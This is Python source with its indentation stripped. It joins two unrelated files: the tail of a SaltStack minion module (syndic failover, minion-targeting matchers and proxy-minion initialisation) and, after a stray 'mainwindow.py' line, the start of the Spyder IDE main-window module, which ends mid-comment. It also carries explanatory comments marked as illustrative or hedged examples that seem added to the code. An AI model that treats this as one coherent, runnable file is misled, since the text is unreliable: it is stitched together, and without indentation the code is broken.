# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
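# Hedged example of the retry backoff above (the numbers are assumptions): with
# acceptance_wait_time=10 and acceptance_wait_time_max=60, the sleep after each
# failed sign-in grows 20, 30, 40, 50, 60 seconds and then stays at 60, because
# auth_wait is only incremented while it is below the maximum.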
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
success = False
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
success = True
if self.opts['syndic_forward_all_events']:
continue
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
if not success:
log.critical('Unable to call {0} on any masters!'.format(func))
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call '_return_pub_multi' on a syndic, best effort to get the one you asked for
'''
success = False
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values)
self.pub_futures[master] = (future, values)
success = True
if self.opts['syndic_forward_all_events']:
continue
break
return success
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
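# Illustrative sketch (assumed data, not in the original source): with
# self._syndics == OrderedDict([('m1', f1), ('m2', f2), ('m3', f3)]) and
# syndic_failover set to 'random', iter_master_options('m2') yields ('m2', f2)
# first and then the remaining masters in shuffled order; without a master_id
# the first yielded master is simply the first entry of the (possibly shuffled)
# list.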
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event {0}'.format(mtag)) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top-level master, don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
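# Illustrative sketch of the aggregation built above (all concrete values are
# assumptions made up for the example):
#   self.job_rets == {
#       'master01': {
#           'salt/job/20190101000000000000/ret/web01': {
#               '__fun__': 'test.ping',
#               '__jid__': '20190101000000000000',
#               '__load__': {...},           # filled once per jid
#               '__master_id__': 'master01',
#               'web01': {'return': True, 'retcode': 0, 'success': True},
#           },
#       },
#   }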
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = self.job_rets[master].values()
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class Matcher(object):
'''
Used to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
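# Hedged doctest-style examples for the matchers above (the minion id
# 'web01.example.com' is an assumption, not from the original source):
#   >>> import fnmatch, re
#   >>> fnmatch.fnmatch('web01.example.com', 'web*')                # glob_match
#   True
#   >>> bool(re.match(r'web\d+', 'web01.example.com'))              # pcre_match
#   True
#   >>> 'web01.example.com' in 'web01.example.com,db01'.split(',')  # list_match
#   True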
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
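# Illustrative note (example values assumed, not from the original source):
# grain targets are '<path><delimiter><pattern>' strings resolved with
# salt.utils.subdict_match, e.g. 'os:Ubuntu' or a nested path such as
# 'systemd:version:2*'; grain_pcre_match treats the pattern part as a regex
# instead of a glob.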
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
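# Hedged example (key/value assumed): data_match targets look like
# 'key:value_glob', e.g. 'role:web*', and are checked against the minion's
# local data store via the data.getval execution function loaded above.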
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: {0}'.format(tgt))
return []
proto = 'ipv{0}'.format(tgt.version)
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = str(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
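# Illustrative sketch (addresses assumed, not from the original source):
# a tgt of '192.168.1.0/24' becomes an ip_network and is checked with
# salt.utils.network.in_subnet() against grains['ipv4'], while a tgt of
# '192.168.1.10' becomes an ip_address and must appear verbatim in
# grains['ipv4'].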
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
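# Hedged example of a compound target handled above (the minion data is
# assumed): 'G@os:Ubuntu and web* or E@db\d+' is tokenised word by word:
# 'G@os:Ubuntu' dispatches to grain_match, 'E@db\d+' to pcre_match, the bare
# 'web*' falls through to glob_match, and the boolean words are kept as-is,
# so the results string might be 'True and True or False', which is then
# evaluated with eval().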
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id '+self.opts['id']+'. '+\
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['environment'])
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname)+\
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
proxy_init_fn = self.proxy[fq_proxyname+'.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv=self.opts['environment'])
self.grains_cache = self.opts['grains']
self.ready = True
mainwindow.py
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
import errno
import gc
import logging
import os
import os.path as osp
import re
import signal
import socket
import subprocess
import sys
import threading
import traceback
import importlib
logger = logging.getLogger(__name__)
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow,
QMenu, QMessageBox, QShortcut, QSplashScreen,
QStyleFactory, QWidget, QDesktopWidget)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# For issue 7447
try:
from qtpy.QtQuick import QQuickWindow, QSGRendererInterface
except Exception:
QQuickWindow = QSGRendererInterface = None
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attribute must
# be set before creating the application.
#==============================================================================
from spyder.config.main import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV, running_under_pytest
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg')))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __website_url__, get_versions)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
get_debug_level, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_gtk_desktop
from spyder.app.cli_options import get_options
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
from spyder.config.gui import is_dark_font_color
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri)
from spyder.config.gui import get_shortcut
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
#==============================================================================
# Third-party library imports
#==============================================================================
import qdarkstyle
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Utility functions
#==============================================================================
def get_python_doc_path():
"""
Return Python documentation path
(Windows: return the PythonXX.chm path if available)
"""
if os.name == 'nt':
doc_path = osp.join(sys.prefix, "Doc")
if not osp.isdir(doc_path):
return
python_chm = [path for path in os.listdir(doc_path)
if re.match(r"(?i)Python[0-9]{3,6}.chm", path)]
if python_chm:
return file_uri(osp.join(doc_path, python_chm[0]))
else:
vinf = sys.version_info
doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1])
python_doc = osp.join(doc_path, "index.html")
if osp.isfile(python_doc):
return file_uri(python_doc)
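# Hedged doctest for the pattern used above (the file name is assumed):
#   >>> import re
#   >>> bool(re.match(r"(?i)Python[0-9]{3,6}.chm", "python374.chm"))
#   True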
def set_opengl_implementation(option):
"""
Set the OpenGL implementation used by Spyder.
See issue 7447 for the details.
"""
if option == 'software':
QCoreApplication.setAttribute(Qt.AA_UseSoftwareOpenGL)
if QQuickWindow is not None:
QQuickWindow.setSceneGraphBackend(QSGRendererInterface.Software)
elif option == 'desktop':
QCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL)
if QQuickWindow is not None:
QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL)
elif option == 'gles':
QCoreApplication.setAttribute(Qt.AA_UseOpenGLES)
if QQuickWindow is not None:
QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL)
def setup_logging(cli_options):
"""Setup logging with cli options defined by the user."""
if cli_options.debug_info or get_debug_level() > 0:
levels = {2: logging.INFO, 3: logging.DEBUG}
log_level = levels[get_debug_level()]
log_format = '%(asctime)s [%(levelname)s] [%(name)s] -> %(message)s'
if cli_options.debug_output == 'file':
log_file = 'spyder-debug.log'
else:
log_file = None
logging.basicConfig(level=log_level,
format=log_format,
filename=log_file,
filemode='w+')
def qt_message_handler(msg_type, msg_log_context, msg_string):
"""
Qt warning messages are intercepted by this handler.
On some operating systems, warning messages might be displayed
even if the actual message does not apply. This filter adds a
blacklist for messages that are being printed for no apparent
reason. Anything else will get printed in the internal console.
In DEV mode, all messages are printed.
"""
BLACKLIST = [
'QMainWidget::resizeDocks: all sizes need to be larger than 0',
]
if DEV or msg_string not in BLACKLIST:
print(msg_string) # spyder: test-skip
qInstallMessageHandler(qt_message_handler)
# =============================================================================
# Dependencies
# =============================================================================
QDARKSTYLE_REQVER = '>=2.6.4'
dependencies.add("qdarkstyle", _("Dark style for the entire interface"),
required_version=QDARKSTYLE_REQVER)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "https://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "https://matplotlib.org/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
all_actions_defined = Signal()
sig_pythonpath_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
self.open_project = options.project
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make Spyder quit when pressing Ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Loading Spyder path
self.path = []
self.not_active_path = []
self.project_path = []
if osp.isfile(self.SPYDER_PATH):
self.path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = [name for name in self.path if osp.isdir(name)]
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
self.not_active_path, _x = \
encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = \
[name for name in self.not_active_path if osp.isdir(name)]
self.remove_path_from_sys_path()
self.add_path_to_sys_path()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.fileswitcher = None
# Check-for-updates Thread and Worker; references are needed to prevent
